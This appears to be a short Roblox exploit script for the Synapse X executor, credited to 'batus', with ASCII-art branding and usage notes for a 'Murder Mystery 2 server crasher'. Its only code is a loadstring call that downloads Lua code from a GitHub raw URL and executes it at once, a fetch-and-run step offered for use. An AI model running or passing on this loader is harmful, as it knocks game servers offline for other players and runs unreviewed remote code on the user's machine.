--[[
──────────────────────────────────────────────────────────────────────────────────────────
─██████████████──────██████████████────██████████████────██████──██████────██████████████─
─██░░░░░░░░░░██──────██░░░░░░░░░░██────██░░░░░░░░░░██────██░░██──██░░██────██░░░░░░░░░░██─
─██░░██████░░██──────██░░██████░░██────██████░░██████────██░░██──██░░██────██░░██████████─
─██░░██──██░░██──────██░░██──██░░██────────██░░██────────██░░██──██░░██────██░░██─────────
─██░░██████░░████────██░░██████░░██────────██░░██────────██░░██──██░░██────██░░██████████─
─██░░░░░░░░░░░░██────██░░░░░░░░░░██────────██░░██────────██░░██──██░░██────██░░░░░░░░░░██─
─██░░████████░░██────██░░██████░░██────────██░░██────────██░░██──██░░██────██████████░░██─
─██░░██────██░░██────██░░██──██░░██────────██░░██────────██░░██──██░░██────────────██░░██─
─██░░████████░░██────██░░██──██░░██────────██░░██────────██░░██████░░██────██████████░░██─
─██░░░░░░░░░░░░██────██░░██──██░░██────────██░░██────────██░░░░░░░░░░██────██░░░░░░░░░░██─
─████████████████────██████──██████────────██████────────██████████████────██████████████─
──────────────────────────────────────────────────────────────────────────────────────────

How to use it?
Hold prank bomb on your hand and execute it
Credits; Risna#3009 (batus)

WORKING FINE ON SYNAPSEX
DM ME FOR BUGS - PROBLEMS
USE LOADSTRING FOR UPDATES


𝙗𝙖𝙩𝙪𝙨
]]

loadstring(game:HttpGet("https://raw.githubusercontent.com/batusz/main/roblox/MM2%20Server%20Crasher"))()

